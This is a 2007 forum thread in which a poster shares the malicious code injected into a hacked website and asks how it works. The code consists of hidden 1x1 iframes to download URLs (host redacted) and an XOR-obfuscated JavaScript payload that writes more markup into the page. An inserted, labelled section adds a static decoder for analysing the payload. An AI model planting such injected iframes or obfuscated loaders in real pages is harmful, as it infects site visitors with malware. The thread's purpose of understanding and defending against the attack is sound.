site hacked - can anyone de-code this?

Posted by Disraeli on May 5, 2007, 4:51 pm
A friend of mine had his web server hacked and his webpage contained the
following script that seemed to trigger off a "downloader trojan" warning
when I inadvertently opened the page in my browser.

I'm not up on scripting, so would appreciate it if anyone could tell me how this
thing works, or if it left any trace of 'whodunnit'...? :)

Thanks for any help


(WARNING: those links may still be live trojans,
don't visit those sites unless you're protected)

==============BEGIN CODE ===========

<iframe src="http://removethisline/dl/adv407.php" width=1 height=1></iframe>
<br>
<br>
<iframe src='http://removethisline/strong/167/' width=1 height=1></iframe>
<iframe src='http://removethisline/adv/new.php?adv=167' width=1
height=1></iframe>
<script language="JavaScript">e = '0x00' + '5F';str1 =
"%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7
%BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1%
F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF%C
0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2";s
tr=tmp='';for(i=0;i<str1.length;i+=3){tmp =
unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e
)-127);}document.write(str);</script>

=================END OF CODE===============
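
How the script in the post above works, shown as a static decoder: each `%XX` byte is XORed with 0x5F, 127 is subtracted, and the script hands the resulting markup to `document.write`. This is an added example, not part of the original thread; the function names and the sample string (which points at `example.invalid`) are constructed for illustration.

```javascript
// Added example: static decoder for the scheme used by the posted script,
//   decoded char = (byte XOR 0x5F) - 127
// The payload is treated as data only: no eval, no document.write.
const XOR_KEY = 0x5f; // the script builds this as '0x00' + '5F'
const OFFSET = 127;

function decodePayload(encoded) {
  // Line wrapping (as in the post) can split a %XX token, so strip whitespace.
  const compact = encoded.replace(/\s+/g, '');
  if (!/^(?:%[0-9A-Fa-f]{2})+$/.test(compact)) {
    throw new Error('expected a sequence of %XX tokens');
  }
  let out = '';
  for (let i = 0; i < compact.length; i += 3) {
    const byte = parseInt(compact.slice(i + 1, i + 3), 16);
    out += String.fromCharCode((byte ^ XOR_KEY) - OFFSET);
  }
  return out;
}

// Pull frame sources out of the decoded markup without rendering it.
function extractFrameSources(markup) {
  const re = /<i?frame\b[^>]*?\bsrc\s*=\s*(["']?)([^"'\s>]+)\1/gi;
  return Array.from(markup.matchAll(re), (m) => m[2]);
}

// Defang a URL so it can go into a ticket or abuse report without being clickable.
function defang(url) {
  return url.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');
}

function analyze(encoded) {
  const markup = decodePayload(encoded);
  return { markup, sources: extractFrameSources(markup).map(defang) };
}

// Constructed sample (not the payload from the post), encoded with the same
// scheme and wrapped mid-token the way the posted string is.
const SAMPLE = `%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1%F
1%BB%A8%BF%B3%B0%B4%BB%F2%B7%B2%AA%BF%B4%B7%BC%F1%FE%C0%A9%B7%BC%AC%B8%E3%E
F%C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2`;

console.log(analyze(SAMPLE));
```

Run it with Node on a copy of the `str1` value; the decoded markup and any frame sources are printed as text and nothing is fetched.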




Posted by Mr. Arnold on May 5, 2007, 6:37 pm

> A friend of mine had his web server hacked and his webpage contained the
> following script that seemed to trigger off a "downloader trojan" warning
> when I inadvertently opened the page in my browser.
>
> I'm not up on scripting, so would appreciate it if anyone could tell me how this
> thing works, or if it left any trace of 'whodunnit'...? :)
>
> Thanks for any help

Why bother? All that's going to happen is the site is going to get hacked
again, because the Web server, file system, user accounts, the registry and
the O/S are not secured.

